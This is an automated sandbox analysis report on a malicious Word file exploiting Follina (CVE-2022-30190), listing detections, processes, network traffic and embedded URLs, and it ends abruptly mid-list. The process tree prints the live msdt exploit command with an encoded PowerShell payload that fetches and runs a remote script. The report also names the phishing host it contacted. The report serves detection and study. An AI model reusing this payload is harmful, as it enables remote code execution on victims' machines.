Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WF0SlQWKr1.docx

Overview

General Information

Sample Name:WF0SlQWKr1.docx
Analysis ID:648583
MD5:783f850d06c9f1286eb9b1bda0af0bce
SHA1:08011884c9bed126b4cfbadad4a4be5063805230
SHA256:211a1f74eea68ebe7178d90f0df0446a87cdda865145c397b7a32e253086139e
Tags:CVE-2022-30190docxFollina
Infos:

Detection

Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Queries memory information (via WMI often done to detect virtual machines)
Suspicious powershell command line found
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Uses ipconfig to lookup or modify the Windows network settings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6548 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7052 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6732 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • powershell.exe (PID: 1320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ipconfig.exe (PID: 4712 cmdline: "C:\Windows\system32\ipconfig.exe" /all MD5: B0C7423D02A007461C850CD0DFE09318)
  • csc.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 7124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x38a:$olerel: relationships/oleObject
  • 0x3a3:$target1: Target="http
  • 0x3df:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htmSUSP_obfuscated_JS_obfuscatorioDetect JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
    • 0x1aad:$c8: while(!![])
    • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
    • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
    • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
    • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htmSUSP_obfuscated_JS_obfuscatorioDetect JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
      • 0x1aad:$c8: while(!![])
      • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
      • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
      • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
      • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htmSUSP_obfuscated_JS_obfuscatorioDetect JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
        • 0x1aad:$c8: while(!![])
        • 0x1acc:$d1: parseInt(_0x178349(0x197))/0x1*(parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+
        • 0x1aec:$d1: parseInt(_0x178349(0x19b))/0x2)+-parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-
        • 0x1b0d:$d1: parseInt(_0x178349(0x198))/0x3+-parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-
        • 0x1b2d:$d1: parseInt(_0x178349(0x195))/0x4*(parseInt(_0x178349(0x19e))/0x5)+-parseInt(_0x178349(0x199))/0x6+parseInt(_0x178349(0x194))/0x7*(-parseInt(_0x178349(0x19c))/0x8)+-parseInt(_0x178349(0x196))/0x9+
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
        • 0x1cec:$a: PCWDiagnostic
        • 0x3c5b:$a: PCWDiagnostic
        • 0x52ae:$a: PCWDiagnostic
        • 0x1c84:$sa1: msdt.exe
        • 0x1cc0:$sa1: msdt.exe
        • 0x2512:$sa1: msdt.exe
        • 0x3c45:$sa1: msdt.exe
        • 0x5b64:$sa1: msdt.exe
        • 0x1d92:$sb3: IT_BrowseForFile=
        • 0x3cae:$sb3: IT_BrowseForFile=
        00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
          00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
          • 0x2338:$a: PCWDiagnostic
          • 0x22d0:$sa1: msdt.exe
          • 0x230c:$sa1: msdt.exe
          • 0x2b5e:$sa1: msdt.exe
          • 0x23de:$sb3: IT_BrowseForFile=
          00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
            00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
            • 0xad86:$a: PCWDiagnostic
            • 0x167a4:$a: PCWDiagnostic
            • 0x228e2:$a: PCWDiagnostic
            • 0x3090:$sa1: msdt.exe
            • 0x6900:$sa1: msdt.exe
            • 0x190a6:$sa1: msdt.exe
            • 0x228b8:$sa1: msdt.exe
            • 0x22986:$sb3: IT_BrowseForFile=
            • 0x2314a:$sb3: IT_BrowseForFile=
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_1320.amsi.csvRecon_Commands_Windows_Gen1Detects a set of reconnaissance commands on Windows systemsFlorian Roth
            • 0xf88:$s1: netstat -an
            • 0xe57:$s2: net view
            • 0xfdf:$s3: net user
            • 0xfb7:$s20: arp -a

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:116.203.251.9192.168.2.3443497452025011 06/20/22-08:29:56.120422
            SID:2025011
            Source Port:443
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: WF0SlQWKr1.docxVirustotal: Detection: 20%Perma Link
            Antivirus detection for URL or domain
            Source: https://upgrade.4nmn.com/microsoft.htmlAvira URL Cloud: Label: phishing
            Multi AV Scanner detection for domain / URL
            Source: upgrade.4nmn.comVirustotal: Detection: 5%Perma Link
            Source: https://upgrade.4nmn.com/microsoft.htmlVirustotal: Detection: 6%Perma Link

            Exploits

            barindex
            Yara detected Microsoft Office Exploit Follina CVE-2022-30190
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, type: DROPPED
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49745 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
            Source: global trafficDNS query: name: upgrade.4nmn.com
            Source: global trafficTCP traffic: 192.168.2.3:49734 -> 116.203.251.9:443
            Source: global trafficTCP traffic: 192.168.2.3:49734 -> 116.203.251.9:443
            Source: winword.exeMemory has grown: Private usage: 0MB later: 77MB

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 116.203.251.9:443 -> 192.168.2.3:49745
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comIf-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMTIf-None-Match: "b0474a7ada82d81:0"Connection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
            Source: powershell.exe, 00000019.00000003.457391782.0000000003539000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.452506340.0000000003539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.aadrm.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.cortana.ai
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.office.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.onedrive.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://augloop.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cdn.entity.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cortana.ai
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cortana.ai/api
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://cr.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dev.cortana.ai
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://directory.services.
